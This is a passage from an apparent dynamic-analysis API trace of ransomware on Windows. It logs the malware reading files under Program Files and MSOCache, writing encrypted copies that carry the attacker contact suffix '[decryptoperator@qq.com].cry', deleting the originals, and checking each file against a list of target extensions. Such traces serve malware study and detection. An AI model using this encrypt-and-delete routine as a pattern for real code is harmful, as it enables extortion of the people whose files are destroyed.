users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0037.130] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=31094) returned 1 [0037.130] CloseHandle (hObject=0x184) returned 1 [0037.131] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0037.131] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.131] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0037.131] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.131] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.131] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0037.131] GetLastError () returned 0x0 [0037.131] ReadFile (in: hFile=0x184, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x7976, lpOverlapped=0x0) returned 1 [0037.451] WriteFile (in: hFile=0x17c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x7980, lpOverlapped=0x0) returned 1 [0037.453] ReadFile (in: hFile=0x184, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.453] WriteFile (in: hFile=0x17c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.453] SetEndOfFile (hFile=0x17c) returned 1 [0037.453] CloseHandle (hObject=0x17c) returned 1 [0037.454] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.454] SetEndOfFile (hFile=0x184) returned 1 [0037.455] CloseHandle (hObject=0x184) returned 1 [0037.455] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0037.455] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0037.456] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.456] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.456] lstrlenW (lpString=".doc") returned 4 [0037.456] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.456] lstrlenW (lpString=".docx") returned 5 [0037.456] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.456] lstrlenW (lpString=".pdf") returned 4 [0037.456] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.456] lstrlenW (lpString=".xls") returned 4 [0037.456] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.456] lstrlenW (lpString=".xlsx") returned 5 [0037.456] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.456] lstrlenW (lpString=".ppt") returned 4 [0037.456] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.456] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.456] lstrlenW (lpString=".zip") returned 4 [0037.456] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.456] lstrlenW (lpString=".rar") returned 4 [0037.456] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.456] lstrlenW (lpString=".bz2") returned 4 [0037.456] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.456] lstrlenW (lpString=".7z") returned 3 [0037.456] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.457] lstrlenW (lpString=".dbf") returned 4 [0037.457] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.457] lstrlenW (lpString=".1cd") returned 4 [0037.457] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.457] lstrlenW (lpString=".jpg") returned 4 [0037.457] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.457] lstrlenW (lpString=".doc") returned 4 [0037.457] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.457] lstrlenW (lpString=".docx") returned 5 [0037.457] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.457] lstrlenW (lpString=".pdf") returned 4 [0037.457] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.457] lstrlenW (lpString=".xls") returned 4 [0037.457] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.457] lstrlenW (lpString=".xlsx") returned 5 [0037.457] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.457] lstrlenW (lpString=".ppt") returned 4 [0037.457] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.457] lstrlenW (lpString=".zip") returned 4 [0037.457] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.457] lstrlenW (lpString=".rar") returned 4 [0037.457] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.458] lstrlenW (lpString=".bz2") returned 4 [0037.458] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.458] lstrlenW (lpString=".7z") returned 3 [0037.458] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.458] lstrlenW (lpString=".dbf") returned 4 [0037.458] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.458] lstrlenW (lpString=".1cd") returned 4 [0037.458] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.458] lstrlenW (lpString=".jpg") returned 4 [0037.458] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.458] lstrcmpiW (lpString1=".JPG", lpString2=".cry") returned 1 [0037.458] lstrlenW (lpString="MS.JPG") returned 6 [0037.458] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.462] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1061) returned 1 [0037.462] CloseHandle (hObject=0x1a4) returned 1 [0037.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 0x20 [0037.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.462] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.462] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.463] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.463] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0037.463] GetLastError () returned 0x0 [0037.463] ReadFile (in: hFile=0x1a4, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x425, lpOverlapped=0x0) returned 1 [0037.480] WriteFile (in: hFile=0x19c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x430, lpOverlapped=0x0) returned 1 [0037.481] ReadFile (in: hFile=0x1a4, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.481] WriteFile (in: hFile=0x19c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0037.481] SetEndOfFile (hFile=0x19c) returned 1 [0037.481] CloseHandle (hObject=0x19c) returned 1 [0037.481] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.481] SetEndOfFile (hFile=0x1a4) returned 1 [0037.482] CloseHandle (hObject=0x1a4) returned 1 [0037.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0037.482] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 1 [0037.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.483] lstrlenW (lpString=".doc") returned 4 [0037.483] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0037.483] lstrlenW (lpString=".docx") returned 5 [0037.483] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0037.483] lstrlenW (lpString=".pdf") returned 4 [0037.483] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0037.483] lstrlenW (lpString=".xls") returned 4 [0037.483] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0037.483] lstrlenW (lpString=".xlsx") returned 5 [0037.483] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0037.483] lstrlenW (lpString=".ppt") returned 4 [0037.483] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0037.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.483] lstrlenW (lpString=".zip") returned 4 [0037.483] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0037.483] lstrlenW (lpString=".rar") returned 4 [0037.483] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0037.483] lstrlenW (lpString=".bz2") returned 4 [0037.483] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0037.483] lstrlenW (lpString=".7z") returned 3 [0037.483] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0037.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.483] lstrlenW (lpString=".dbf") returned 4 [0037.483] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0037.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.483] lstrlenW (lpString=".1cd") returned 4 [0037.483] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0037.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.483] lstrlenW (lpString=".jpg") returned 4 [0037.483] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0037.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.484] lstrlenW (lpString=".doc") returned 4 [0037.484] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0037.484] lstrlenW (lpString=".docx") returned 5 [0037.484] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0037.484] lstrlenW (lpString=".pdf") returned 4 [0037.484] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0037.484] lstrlenW (lpString=".xls") returned 4 [0037.484] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0037.484] lstrlenW (lpString=".xlsx") returned 5 [0037.484] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0037.484] lstrlenW (lpString=".ppt") returned 4 [0037.484] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0037.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.484] lstrlenW (lpString=".zip") returned 4 [0037.484] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0037.484] lstrlenW (lpString=".rar") returned 4 [0037.484] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0037.484] lstrlenW (lpString=".bz2") returned 4 [0037.484] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0037.484] lstrlenW (lpString=".7z") returned 3 [0037.484] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0037.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.484] lstrlenW (lpString=".dbf") returned 4 [0037.484] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0037.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.484] lstrlenW (lpString=".1cd") returned 4 [0037.484] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0037.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.484] lstrlenW (lpString=".jpg") returned 4 [0037.484] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0037.484] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0037.484] lstrlenW (lpString="Alphabet.xml") returned 12 [0037.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0037.659] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=791686) returned 1 [0037.659] CloseHandle (hObject=0x184) returned 1 [0037.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0037.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.659] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.659] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.659] lstrlenW (lpString=".doc") returned 4 [0037.659] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.659] lstrlenW (lpString=".docx") returned 5 [0037.659] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0037.659] lstrlenW (lpString=".pdf") returned 4 [0037.659] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.659] lstrlenW (lpString=".xls") returned 4 [0037.659] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.659] lstrlenW (lpString=".xlsx") returned 5 [0037.659] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0037.659] lstrlenW (lpString=".ppt") returned 4 [0037.659] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.659] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.659] lstrlenW (lpString=".zip") returned 4 [0037.659] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.659] lstrlenW (lpString=".rar") returned 4 [0037.660] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString=".bz2") returned 4 [0037.660] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString=".7z") returned 3 [0037.660] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.660] lstrlenW (lpString=".dbf") returned 4 [0037.660] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.660] lstrlenW (lpString=".1cd") returned 4 [0037.660] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.660] lstrlenW (lpString=".jpg") returned 4 [0037.660] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.660] lstrlenW (lpString=".doc") returned 4 [0037.660] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString=".docx") returned 5 [0037.660] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0037.660] lstrlenW (lpString=".pdf") returned 4 [0037.660] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString=".xls") returned 4 [0037.660] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString=".xlsx") returned 5 [0037.660] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0037.660] lstrlenW (lpString=".ppt") returned 4 [0037.660] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.660] lstrlenW (lpString=".zip") returned 4 [0037.660] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.660] lstrlenW (lpString=".rar") returned 4 [0037.660] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString=".bz2") returned 4 [0037.660] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.660] lstrlenW (lpString=".7z") returned 3 [0037.660] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.661] lstrlenW (lpString=".dbf") returned 4 [0037.661] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.661] lstrlenW (lpString=".1cd") returned 4 [0037.661] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0037.661] lstrlenW (lpString=".jpg") returned 4 [0037.661] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.661] lstrcmpiW (lpString1=".avi", lpString2=".cry") returned -1 [0037.661] lstrlenW (lpString="boxed-join.avi") returned 14 [0037.661] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.616] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=33280) returned 1 [0038.616] CloseHandle (hObject=0x1a0) returned 1 [0038.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0038.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.617] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.617] lstrlenW (lpString=".doc") returned 4 [0038.617] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.617] lstrlenW (lpString=".docx") returned 5 [0038.617] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0038.617] lstrlenW (lpString=".pdf") returned 4 [0038.617] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.617] lstrlenW (lpString=".xls") returned 4 [0038.617] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.617] lstrlenW (lpString=".xlsx") returned 5 [0038.617] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0038.617] lstrlenW (lpString=".ppt") returned 4 [0038.617] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.617] lstrlenW (lpString=".zip") returned 4 [0038.617] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.617] lstrlenW (lpString=".rar") returned 4 [0038.617] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.617] lstrlenW (lpString=".bz2") returned 4 [0038.617] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.617] lstrlenW (lpString=".7z") returned 3 [0038.617] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.618] lstrlenW (lpString=".dbf") returned 4 [0038.618] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.618] lstrlenW (lpString=".1cd") returned 4 [0038.618] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.618] lstrlenW (lpString=".jpg") returned 4 [0038.618] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 